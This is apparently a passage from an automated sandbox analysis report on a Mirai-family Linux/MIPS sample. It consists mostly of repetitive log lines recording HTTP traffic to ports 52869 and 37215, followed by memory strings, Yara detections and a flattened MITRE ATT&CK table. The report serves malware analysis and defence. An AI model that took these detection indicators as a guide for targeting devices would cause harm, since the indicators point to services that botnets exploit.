    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46228 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42300 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36066
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 36068
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55306 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38710 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38714 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42490 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53976 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54542 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 57466
    Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 57468
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45032 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59916 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: /tmp/KHSQ48GkGn (PID: 5238)Queries kernel information via 'uname':
    Source: KHSQ48GkGn, 5238.1.000000004cffab3f.00000000008c8373.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/KHSQ48GkGnSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/KHSQ48GkGn
    Source: KHSQ48GkGn, 5238.1.00000000b21f652b.00000000ecc012f9.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
    Source: KHSQ48GkGn, 5238.1.00000000b21f652b.00000000ecc012f9.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
    Source: KHSQ48GkGn, 5238.1.000000004cffab3f.00000000008c8373.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips

    Stealing of Sensitive Information:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
